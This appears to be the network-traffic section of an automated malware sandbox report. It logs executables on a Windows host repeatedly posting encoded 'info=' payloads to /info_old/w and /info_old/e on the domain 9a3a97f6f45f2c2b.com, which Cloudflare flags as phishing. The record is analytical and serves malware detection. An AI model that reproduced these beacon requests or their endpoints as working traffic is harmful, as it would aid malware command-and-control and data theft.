                                                                                                                                                                Data Ascii: ,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen
                                                                                                                                                                Mar 7, 2021 19:21:08.215157032 CET630INData Raw: 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77
                                                                                                                                                                Data Ascii: r --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to ac
                                                                                                                                                                Mar 7, 2021 19:21:08.215173006 CET631INData Raw: 68 69 6e 67 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 54 72 75 73 74 20 26 61 6d 70 3b 20 53 61 66 65 74 79 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: hing please contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm
                                                                                                                                                                Mar 7, 2021 19:21:08.215186119 CET631INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                Mar 7, 2021 19:21:08.584676027 CET632OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:08.584753990 CET632OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 66 78 4e 35 6f 4e 75 36 76 6c 79 6e 59 4c 33 50 36 4d 6f 6b 5f 77 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVfxN5oNu6vlynYL3P6Mok_w~
                                                                                                                                                                Mar 7, 2021 19:21:08.636893988 CET634INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=dd545e47b452c86c965fe3fab796d3f111615141268; expires=Tue, 06-Apr-21 18:21:08 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af85048c0000065af2a5f000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ShJlufa9%2Bs2A23rt6QPWuIejAOnZXp28yYe4AGaJcy5AYan9DGRwYcA7erXXel0wVgybpl2eCZXTYZ2nNE6WQLiwhXar4C%2FEdSEB8lFZXPkWoEJAHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d780ecde065a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrom
                                                                                                                                                                Mar 7, 2021 19:21:08.636929035 CET635INData Raw: 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                                                                                Data Ascii: e=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,proje
                                                                                                                                                                Mar 7, 2021 19:21:08.637360096 CET637INData Raw: 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20
                                                                                                                                                                Data Ascii: <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.549722104.21.6.7880C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Mar 7, 2021 19:21:13.183574915 CET709OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:13.183664083 CET709OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 54 4d 71 79 52 4d 68 73 6f 6e 31 65 67 6a 71 6c 6f 6c 4a 54 6b 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVaTMqyRMhson1egjqlolJTk~
                                                                                                                                                                Mar 7, 2021 19:21:13.254826069 CET711INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:13 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d5064e1ff96773a428242901dd8ba7c271615141273; expires=Tue, 06-Apr-21 18:21:13 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8516830000ce578d809000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LIuNoi4HkIh8nWiQ8fnCIKELOEEQy7R3i%2BcqKjQh5ROuECitvs99l8VCYL3QixERDxjRk9l%2BORgioYwZfVTTnGqaAJmJ9C503mhvZ8Aznl9kYDe4tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d79d9d89ce57-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrom
                                                                                                                                                                Mar 7, 2021 19:21:13.254952908 CET712INData Raw: 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                                                                                Data Ascii: e=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,proje
                                                                                                                                                                Mar 7, 2021 19:21:13.255119085 CET713INData Raw: 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20
                                                                                                                                                                Data Ascii: <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire
                                                                                                                                                                Mar 7, 2021 19:21:13.255242109 CET715INData Raw: 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 54 72 75 73 74 20 26 61 6d 70 3b 20 53 61 66 65 74 79 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                                                                                                                                                Data Ascii: lease contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-
                                                                                                                                                                Mar 7, 2021 19:21:13.255342960 CET715INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.549723172.67.134.15780C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Mar 7, 2021 19:21:15.779908895 CET716OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:15.779951096 CET716OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 55 64 32 44 42 50 43 42 37 41 44 44 6f 33 57 55 36 55 50 67 67 38 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVUd2DBPCB7ADDo3WU6UPgg8~
                                                                                                                                                                Mar 7, 2021 19:21:15.858582020 CET718INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:15 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d07326ac00a7d961c1ea4899e9e1ac8c31615141275; expires=Tue, 06-Apr-21 18:21:15 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8520a80000069a65185000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hRNXaTlH0b8rd2RKqJFuQyb%2BfJ3iKql1CJ35Sh9Zy%2BBtyku9ji2FCMloawaovX3RvIG2KoTodY7SrDkCK8mMgdaX2YhyOqFlW4Vzwn0B3nCbsCxHtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7adde29069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrom
                                                                                                                                                                Mar 7, 2021 19:21:15.858613014 CET719INData Raw: 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                                                                                Data Ascii: e=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,proje
                                                                                                                                                                Mar 7, 2021 19:21:15.858638048 CET720INData Raw: 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20
                                                                                                                                                                Data Ascii: <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire
                                                                                                                                                                Mar 7, 2021 19:21:15.858658075 CET722INData Raw: 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 54 72 75 73 74 20 26 61 6d 70 3b 20 53 61 66 65 74 79 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                                                                                                                                                Data Ascii: lease contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-
                                                                                                                                                                Mar 7, 2021 19:21:15.858671904 CET722INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                Mar 7, 2021 19:21:26.895971060 CET934OUTPOST /info_old/e HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 677
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:26.896104097 CET935OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 57 38 59 47 58 55 47 63 4a 56 39 64 37 58 35 54 43 69 63 68 42 6c 4a 50 55 77 4e 61 67 2d 46 6e 59 69 57 45 46 6e 48 6c 6d 72 34 6a 4d 43 6d 65 68 30 6c 57 72 44 52 74 71 54 69 66 48 47 71 31 31 34 6e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTW8YGXUGcJV9d7X5TCichBlJPUwNag-FnYiWEFnHlmr4jMCmeh0lWrDRtqTifHGq114n62eLqovS6CpRvHelxHsYQgfv6UkXl-Tp-W2CDUCyoY_zzduqn_u26OmGrloRmRCvkaKviZHprT6kb2CnJ9V253fE9o5sG4A1NZeS3ssy4Bsgks81n924QlWS29ySQyILQOSwloNJLapwy7Iu1RdQ7c_-WYy-85tha
                                                                                                                                                                Mar 7, 2021 19:21:26.950754881 CET936INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:26 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d6ace4fad79b146bfd51659b6e27f09161615141286; expires=Tue, 06-Apr-21 18:21:26 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af854c160000069ab2b1f000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8xhZqdQjJ4ehHfU13DVLNoefzpNrH0V5RENXxOIHzdGuv8pfSbzRTBOA1GVR%2BQxnJMMHnYcoZQT2oXAppCsjcj0%2FviXYusQMpqIsqGGgDdsN%2BIdA7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7f358ed069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
